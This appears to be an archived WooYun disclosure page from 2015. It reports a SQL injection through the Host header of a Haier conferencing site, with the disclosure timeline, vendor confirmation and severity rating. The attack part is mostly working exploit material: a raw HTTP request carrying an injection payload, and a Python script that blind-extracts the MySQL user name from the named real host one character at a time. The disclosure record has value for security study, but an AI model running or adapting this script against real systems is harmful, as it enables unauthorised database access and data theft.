乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-25: 细节已通知厂商并且等待厂商处理中 2015-08-25: 厂商已经确认,细节仅向厂商公开 2015-09-04: 细节向核心白帽子及相关领域专家公开 2015-09-14: 细节向普通白帽子公开 2015-09-24: 细节向实习白帽子公开 2015-10-09: 细节向公众公开
http://haier.quanshi.com/
GET / HTTP/1.1Host: haier.quanshi.com%' AND length(user())=17 AND '000JkpN'!='000JkpN%User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=Rk0SoIqoQKFyzUuiYenpbJEELfbvUy4%252B.AConnection: keep-alive
Host存在注入
附脚本:
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport urllibheaders = {'Content-Type': 'application/x-www-form-urlencoded'}payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print 'Start to retrive MySQL User:\n'user = ''for i in range(1, 18): for payload in payloads: print '.', s = "haier.quanshi.com%%' AND ascii(mid(lower(user()),%s,1))=%s AND '5'!='5%%" % (i, ord(payload)) headers["Host"]=s conn = httplib.HTTPConnection('haier.quanshi.com', timeout=60) conn.request(method='GET', url='/', headers=headers) html_doc = conn.getresponse().read().decode('utf-8') conn.close() #print html_doc if html_doc.find(u'云会议(') > 0: user += payload sys.stdout.write('\r[In Progress]' + user) sys.stdout.flush() breakprint '[Done]MySQL user is %s' % user
危害等级:高
漏洞Rank:15
确认时间:2015-08-25 16:42
我们会尽快处理,谢谢!
暂无